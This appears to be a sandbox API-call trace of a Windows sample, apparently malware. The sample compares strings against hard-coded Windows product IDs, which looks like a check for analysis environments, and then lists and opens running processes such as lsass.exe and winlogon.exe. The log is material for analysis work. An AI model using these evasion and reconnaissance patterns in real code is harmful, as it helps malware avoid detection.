	[0087.988] GetLastError () returned 0xcb
	[0087.988] GetLastError () returned 0xcb
	[0087.988] GetLastError () returned 0xcb
	[0087.988] GetLastError () returned 0xcb
	[0087.988] GetLastError () returned 0xcb
	[0087.988] GetLastError () returned 0xcb
	[0087.988] GetLastError () returned 0xcb
	[0087.988] GetLastError () returned 0xcb
	[0087.988] GetLastError () returned 0xcb
	[0087.988] GetLastError () returned 0xcb
	[0087.988] GetLastError () returned 0xcb
	[0087.988] GetLastError () returned 0xcb
	[0087.988] GetLastError () returned 0xcb
	[0087.988] GetLastError () returned 0xcb
	[0087.988] GetLastError () returned 0xcb
	[0087.988] GetLastError () returned 0xcb
	[0087.988] GetLastError () returned 0xcb
	[0087.988] GetLastError () returned 0xcb
	[0087.988] GetLastError () returned 0xcb
	[0087.988] GetLastError () returned 0xcb
	[0087.988] GetLastError () returned 0xcb
	[0087.988] GetLastError () returned 0xcb
	[0087.988] GetLastError () returned 0xcb
	[0087.988] GetLastError () returned 0xcb
	[0087.988] GetLastError () returned 0xcb
	[0087.988] GetLastError () returned 0xcb
	[0087.988] GetLastError () returned 0xcb
	[0087.988] GetLastError () returned 0xcb
	[0087.988] GetLastError () returned 0xcb
	[0087.988] GetLastError () returned 0xcb
	[0087.988] GetLastError () returned 0xcb
	[0087.989] GetLastError () returned 0xcb
	[0087.989] GetLastError () returned 0xcb
	[0087.989] StrStrA (lpFirst="GBT    - 1000", lpSrch="76487-644-3177037-23510") returned 0x0
	[0087.989] GetLastError () returned 0xcb
	[0087.989] GetLastError () returned 0xcb
	[0087.989] GetLastError () returned 0xcb
	[0087.989] GetLastError () returned 0xcb
	[0087.989] GetLastError () returned 0xcb
	[0087.989] GetLastError () returned 0xcb
	[0087.989] GetLastError () returned 0xcb
	[0087.989] GetLastError () returned 0xcb
	[0087.989] GetLastError () returned 0xcb
	[0087.989] GetLastError () returned 0xcb
	[0087.989] GetLastError () returned 0xcb
	[0087.989] GetLastError () returned 0xcb
	[0087.989] GetLastError () returned 0xcb
	[0087.989] GetLastError () returned 0xcb
	[0087.989] GetLastError () returned 0xcb
	[0087.989] GetLastError () returned 0xcb
	[0087.989] GetLastError () returned 0xcb
	[0087.989] GetLastError () returned 0xcb
	[0087.989] GetLastError () returned 0xcb
	[0087.989] GetLastError () returned 0xcb
	[0087.989] GetLastError () returned 0xcb
	[0087.989] GetLastError () returned 0xcb
	[0087.989] GetLastError () returned 0xcb
	[0087.989] GetLastError () returned 0xcb
	[0087.989] GetLastError () returned 0xcb
	[0087.989] GetLastError () returned 0xcb
	[0087.989] GetLastError () returned 0xcb
	[0087.989] GetLastError () returned 0xcb
	[0087.989] GetLastError () returned 0xcb
	[0087.989] GetLastError () returned 0xcb
	[0087.989] GetLastError () returned 0xcb
	[0087.989] GetLastError () returned 0xcb
	[0087.989] GetLastError () returned 0xcb
	[0087.989] GetLastError () returned 0xcb
	[0087.989] GetLastError () returned 0xcb
	[0087.989] GetLastError () returned 0xcb
	[0087.989] GetLastError () returned 0xcb
	[0087.989] GetLastError () returned 0xcb
	[0087.989] GetLastError () returned 0xcb
	[0087.989] GetLastError () returned 0xcb
	[0087.989] GetLastError () returned 0xcb
	[0087.989] GetLastError () returned 0xcb
	[0087.989] GetLastError () returned 0xcb
	[0087.989] GetLastError () returned 0xcb
	[0087.989] GetLastError () returned 0xcb
	[0087.989] GetLastError () returned 0xcb
	[0087.989] GetLastError () returned 0xcb
	[0087.989] GetLastError () returned 0xcb
	[0087.989] StrStrA (lpFirst="GBT    - 1000", lpSrch="76487-337-8429955-22614") returned 0x0
	[0087.990] GetLastError () returned 0xcb
	[0087.990] GetLastError () returned 0xcb
	[0087.990] GetLastError () returned 0xcb
	[0087.990] GetLastError () returned 0xcb
	[0087.990] GetLastError () returned 0xcb
	[0087.990] GetLastError () returned 0xcb
	[0087.990] GetLastError () returned 0xcb
	[0087.990] GetLastError () returned 0xcb
	[0087.990] GetLastError () returned 0xcb
	[0087.990] GetLastError () returned 0xcb
	[0087.990] GetLastError () returned 0xcb
	[0087.990] GetLastError () returned 0xcb
	[0087.990] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77960000
	[0087.991] GetProcAddress (hModule=0x77960000, lpProcName="NtQuerySystemInformation") returned 0x779d7000
	[0087.991] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x0, Length=0x0, ResultLength=0x262faa4 | out: SystemInformation=0x0, ResultLength=0x262faa4*=0x163b0) returned 0xc0000004
	[0087.991] VirtualAlloc (lpAddress=0x0, dwSize=0x164b0, flAllocationType=0x3000, flProtect=0x4) returned 0x610000
	[0087.991] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x610000, Length=0x164b0, ResultLength=0x0 | out: SystemInformation=0x610000, ResultLength=0x0) returned 0x0
	[0087.994] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0087.994] GetProcAddress (hModule=0x765a0000, lpProcName="IsWow64Process") returned 0x765b9f10
	[0087.994] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc) returned 0x0
	[0087.994] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="smss.exe", cchWideChar=8, lpMultiByteStr=0x64ffe0, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="smss.exe", lpUsedDefaultChar=0x0) returned 8
	[0087.994] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x144) returned 0x0
	[0087.994] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="csrss.exe", cchWideChar=9, lpMultiByteStr=0x64ff38, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="csrss.exe", lpUsedDefaultChar=0x0) returned 9
	[0087.994] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x18c) returned 0x0
	[0087.994] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="wininit.exe", cchWideChar=11, lpMultiByteStr=0x64fea8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="wininit.exe", lpUsedDefaultChar=0x0) returned 11
	[0087.995] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x198) returned 0x0
	[0087.995] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="csrss.exe", cchWideChar=9, lpMultiByteStr=0x64fe00, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="csrss.exe", lpUsedDefaultChar=0x0) returned 9
	[0087.995] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1cc) returned 0x0
	[0087.995] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="winlogon.exe", cchWideChar=12, lpMultiByteStr=0x64ff80, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="winlogon.exe", lpUsedDefaultChar=0x0) returned 12
	[0087.995] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f0) returned 0x0
	[0087.995] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="services.exe", cchWideChar=12, lpMultiByteStr=0x64fe00, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="services.exe", lpUsedDefaultChar=0x0) returned 12
	[0087.995] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f8) returned 0x0
	[0087.995] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="lsass.exe", cchWideChar=9, lpMultiByteStr=0x64fe48, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="lsass.exe", lpUsedDefaultChar=0x0) returned 9
	[0087.995] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x248) returned 0x0
	[0087.995] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x64ff08, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0087.995] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x268) returned 0x0
	[0087.995] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x64ffc8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0087.996] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2cc) returned 0x0
	[0087.996] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="dwm.exe", cchWideChar=7, lpMultiByteStr=0x65ac48, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="dwm.exe", lpUsedDefaultChar=0x0) returned 7
	[0087.997] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x324) returned 0x0
	[0087.997] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x64ff08, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0087.997] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x34c) returned 0x0
	[0087.997] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x64fe00, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0087.997] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x35c) returned 0x0
	[0087.997] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x64ff08, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0087.997] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3a0) returned 0x0
	[0087.997] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x64fe00, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0087.997] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3c0) returned 0x0
	[0087.997] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x64fd88, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0087.997] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3d4) returned 0x0
	[0087.997] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x64ff38, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0088.043] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe4) returned 0x0
	[0088.044] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x64ffc8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0088.044] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x460) returned 0x0
	[0088.044] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="spoolsv.exe", cchWideChar=11, lpMultiByteStr=0x64fe00, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="spoolsv.exe", lpUsedDefaultChar=0x0) returned 11
	[0088.044] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x50c) returned 0x214
	[0088.044] IsWow64Process (in: hProcess=0x214, Wow64Process=0x262fa28 | out: Wow64Process=0x262fa28) returned 1
	[0088.044] CloseHandle (hObject=0x214) returned 1
	[0088.044] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="sihost.exe", cchWideChar=10, lpMultiByteStr=0x64fe00, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="sihost.exe", lpUsedDefaultChar=0x0) returned 10
	[0088.044] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x600) returned 0x0
	[0088.044] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x64fe90, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0088.044] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x650) returned 0x0
	[0088.044] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="OfficeClickToRun.exe", cchWideChar=20, lpMultiByteStr=0x6590e8, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="OfficeClickToRun.exe", lpUsedDefaultChar=0x0) returned 20
	[0088.044] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6e4) returned 0x214
	[0088.044] IsWow64Process (in: hProcess=0x214, Wow64Process=0x262fa28 | out: Wow64Process=0x262fa28) returned 1
	[0088.044] CloseHandle (hObject=0x214) returned 1
	[0088.044] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="RuntimeBroker.exe", cchWideChar=17, lpMultiByteStr=0x6590e8, cbMultiByte=18, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="RuntimeBroker.exe", lpUsedDefaultChar=0x0) returned 17
	[0088.045] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6d4) returned 0x0
	[0088.045] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x64fd10, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0088.045] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x700) returned 0x214
	[0088.045] IsWow64Process (in: hProcess=0x214, Wow64Process=0x262fa28 | out: Wow64Process=0x262fa28) returned 1
	[0088.045] CloseHandle (hObject=0x214) returned 1
	[0088.045] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="taskhostw.exe", cchWideChar=13, lpMultiByteStr=0x64fd70, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="taskhostw.exe", lpUsedDefaultChar=0x0) returned 13
	[0088.045] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x84c) returned 0x214
	[0088.045] IsWow64Process (in: hProcess=0x214, Wow64Process=0x262fa28 | out: Wow64Process=0x262fa28) returned 1
	[0088.045] CloseHandle (hObject=0x214) returned 1
	[0088.045] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="explorer.exe", cchWideChar=12, lpMultiByteStr=0x64fe00, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="explorer.exe", lpUsedDefaultChar=0x0) returned 12
	[0088.045] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x894) returned 0x214
	[0088.045] IsWow64Process (in: hProcess=0x214, Wow64Process=0x262fa28 | out: Wow64Process=0x262fa28) returned 1
	[0088.045] CloseHandle (hObject=0x214) returned 1
	[0088.045] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SkypeHost.exe", cchWideChar=13, lpMultiByteStr=0x64fe00, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SkypeHost.exe", lpUsedDefaultChar=0x0) returned 13
	[0088.045] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x9cc) returned 0x214
	[0088.045] IsWow64Process (in: hProcess=0x214, Wow64Process=0x262fa28 | out: Wow64Process=0x262fa28) returned 1
	[0088.046] CloseHandle (hObject=0x214) returned 1
	[0088.046] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ShellExperienceHost.exe", cchWideChar=23, lpMultiByteStr=0x658de8, cbMultiByte=24, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ShellExperienceHost.exe", lpUsedDefaultChar=0x0) returned 23
	[0088.046] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa38) returned 0x214
	[0088.046] IsWow64Process (in: hProcess=0x214, Wow64Process=0x262fa28 | out: Wow64Process=0x262fa28) returned 1
	[0088.046] CloseHandle (hObject=0x214) returned 1
	[0088.046] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SearchUI.exe", cchWideChar=12, lpMultiByteStr=0x64ffe0, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SearchUI.exe", lpUsedDefaultChar=0x0) returned 12
	[0088.046] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xae0) returned 0x214
	[0088.046] IsWow64Process (in: hProcess=0x214, Wow64Process=0x262fa28 | out: Wow64Process=0x262fa28) returned 1
	[0088.046] CloseHandle (hObject=0x214) returned 1
	[0088.046] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="dllhost.exe", cchWideChar=11, lpMultiByteStr=0x64ffc8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="dllhost.exe", lpUsedDefaultChar=0x0) returned 11
	[0088.046] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x924) returned 0x0
	[0088.046] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="audiodg.exe", cchWideChar=11, lpMultiByteStr=0x64fe18, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="audiodg.exe", lpUsedDefaultChar=0x0) returned 11
	[0088.046] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x310) returned 0x214
	[0088.046] IsWow64Process (in: hProcess=0x214, Wow64Process=0x262fa28 | out: Wow64Process=0x262fa28) returned 1
	[0088.046] CloseHandle (hObject=0x214) returned 1
	[0088.046] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SkypeHost.exe", cchWideChar=13, lpMultiByteStr=0x64ffe0, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SkypeHost.exe", lpUsedDefaultChar=0x0) returned 13
	[0088.047] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc50) returned 0x214
	[0088.047] IsWow64Process (in: hProcess=0x214, Wow64Process=0x262fa28 | out: Wow64Process=0x262fa28) returned 1
	[0088.047] CloseHandle (hObject=0x214) returned 1
	[0088.047] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x64fe00, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0088.047] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xd80) returned 0x214
	[0088.047] IsWow64Process (in: hProcess=0x214, Wow64Process=0x262fa28 | out: Wow64Process=0x262fa28) returned 1
	[0088.047] CloseHandle (hObject=0x214) returned 1
	[0088.047] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="backgroundTaskHost.exe", cchWideChar=22, lpMultiByteStr=0x659028, cbMultiByte=23, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="backgroundTaskHost.exe", lpUsedDefaultChar=0x0) returned 22
	[0088.047] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe90) returned 0x214
	[0088.047] IsWow64Process (in: hProcess=0x214, Wow64Process=0x262fa28 | out: Wow64Process=0x262fa28) returned 1
	[0088.047] CloseHandle (hObject=0x214) returned 1
	[0088.047] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="develop-patent.exe", cchWideChar=18, lpMultiByteStr=0x658ee8, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="develop-patent.exe", lpUsedDefaultChar=0x0) returned 18
	[0088.047] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xea4) returned 0x214
	[0088.047] IsWow64Process (in: hProcess=0x214, Wow64Process=0x262fa28 | out: Wow64Process=0x262fa28) returned 1
	[0088.047] CloseHandle (hObject=0x214) returned 1
	[0088.047] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="its.exe", cchWideChar=7, lpMultiByteStr=0x65adc8, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="its.exe", lpUsedDefaultChar=0x0) returned 7
	[0088.047] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xeb8) returned 0x214
	[0088.048] IsWow64Process (in: hProcess=0x214, Wow64Process=0x262fa28 | out: Wow64Process=0x262fa28) returned 1
	[0088.048] CloseHandle (hObject=0x214) returned 1
	[0088.048] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="gently budapest.exe", cchWideChar=19, lpMultiByteStr=0x659088, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="gently budapest.exe", lpUsedDefaultChar=0x0) returned 19
	[0088.048] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xecc) returned 0x214
	[0088.048] IsWow64Process (in: hProcess=0x214, Wow64Process=0x262fa28 | out: Wow64Process=0x262fa28) returned 1
	[0088.048] CloseHandle (hObject=0x214) returned 1
	[0088.048] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="thoroughlypriestprefix.exe", cchWideChar=26, lpMultiByteStr=0x658b50, cbMultiByte=27, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="thoroughlypriestprefix.exe", lpUsedDefaultChar=0x0) returned 26
	[0088.048] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xee0) returned 0x214
	[0088.048] IsWow64Process (in: hProcess=0x214, Wow64Process=0x262fa28 | out: Wow64Process=0x262fa28) returned 1
	[0088.048] CloseHandle (hObject=0x214) returned 1
	[0088.048] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="inserted_field.exe", cchWideChar=18, lpMultiByteStr=0x658de8, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="inserted_field.exe", lpUsedDefaultChar=0x0) returned 18
	[0088.048] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xef4) returned 0x214
	[0088.048] IsWow64Process (in: hProcess=0x214, Wow64Process=0x262fa28 | out: Wow64Process=0x262fa28) returned 1
	[0088.048] CloseHandle (hObject=0x214) returned 1
	[0088.048] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="semi bay.exe", cchWideChar=12, lpMultiByteStr=0x64ff08, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="semi bay.exe", lpUsedDefaultChar=0x0) returned 12
	[0088.048] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf08) returned 0x214
	[0088.048] IsWow64Process (in: hProcess=0x214, Wow64Process=0x262fa28 | out: Wow64Process=0x262fa28) returned 1
	[0088.048] CloseHandle (hObject=0x214) returned 1
	[0088.049] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="outdoor.exe", cchWideChar=11, lpMultiByteStr=0x64ffc8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="outdoor.exe", lpUsedDefaultChar=0x0) returned 11
	[0088.049] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf24) returned 0x214
	[0088.049] IsWow64Process (in: hProcess=0x214, Wow64Process=0x262fa28 | out: Wow64Process=0x262fa28) returned 1
	[0088.049] CloseHandle (hObject=0x214) returned 1
	[0088.049] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="wool-parish-horses.exe", cchWideChar=22, lpMultiByteStr=0x658f68, cbMultiByte=23, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="wool-parish-horses.exe", lpUsedDefaultChar=0x0) returned 22
	[0088.049] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf44) returned 0x214
	[0088.049] IsWow64Process (in: hProcess=0x214, Wow64Process=0x262fa28 | out: Wow64Process=0x262fa28) returned 1
	[0088.049] CloseHandle (hObject=0x214) returned 1
	[0088.049] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="spoken-delayed.exe", cchWideChar=18, lpMultiByteStr=0x659028, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="spoken-delayed.exe", lpUsedDefaultChar=0x0) returned 18
	[0088.049] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf60) returned 0x214
	[0088.049] IsWow64Process (in: hProcess=0x214, Wow64Process=0x262fa28 | out: Wow64Process=0x262fa28) returned 1
	[0088.049] CloseHandle (hObject=0x214) returned 1
	[0088.049] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="spokesman.exe", cchWideChar=13, lpMultiByteStr=0x64ff08, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="spokesman.exe", lpUsedDefaultChar=0x0) returned 13
	[0088.049] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf78) returned 0x214
	[0088.049] IsWow64Process (in: hProcess=0x214, Wow64Process=0x262fa28 | out: Wow64Process=0x262fa28) returned 1
	[0088.049] CloseHandle (hObject=0x214) returned 1
	[0088.050] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="oxide.exe", cchWideChar=9, lpMultiByteStr=0x64fd10, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="oxide.exe", lpUsedDefaultChar=0x0) returned 9
	[0088.050] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf8c) returned 0x214
	[0088.050] IsWow64Process (in: hProcess=0x214, Wow64Process=0x262fa28 | out: Wow64Process=0x262fa28) returned 1
	[0088.050] CloseHandle (hObject=0x214) returned 1
	[0088.050] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="off-covered-playlist.exe", cchWideChar=24, lpMultiByteStr=0x658c68, cbMultiByte=25, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="off-covered-playlist.exe", lpUsedDefaultChar=0x0) returned 24
	[0088.050] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfac) returned 0x214
	[0088.050] IsWow64Process (in: hProcess=0x214, Wow64Process=0x262fa28 | out: Wow64Process=0x262fa28) returned 1
	[0088.050] CloseHandle (hObject=0x214) returned 1
	[0088.050] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc0) returned 0x214
	[0088.050] IsWow64Process (in: hProcess=0x214, Wow64Process=0x262fa28 | out: Wow64Process=0x262fa28) returned 1
	[0088.050] CloseHandle (hObject=0x214) returned 1
	[0088.050] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfe4) returned 0x214
	[0088.050] IsWow64Process (in: hProcess=0x214, Wow64Process=0x262fa28 | out: Wow64Process=0x262fa28) returned 1
	[0088.050] CloseHandle (hObject=0x214) returned 1
	[0088.051] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc14) returned 0x214
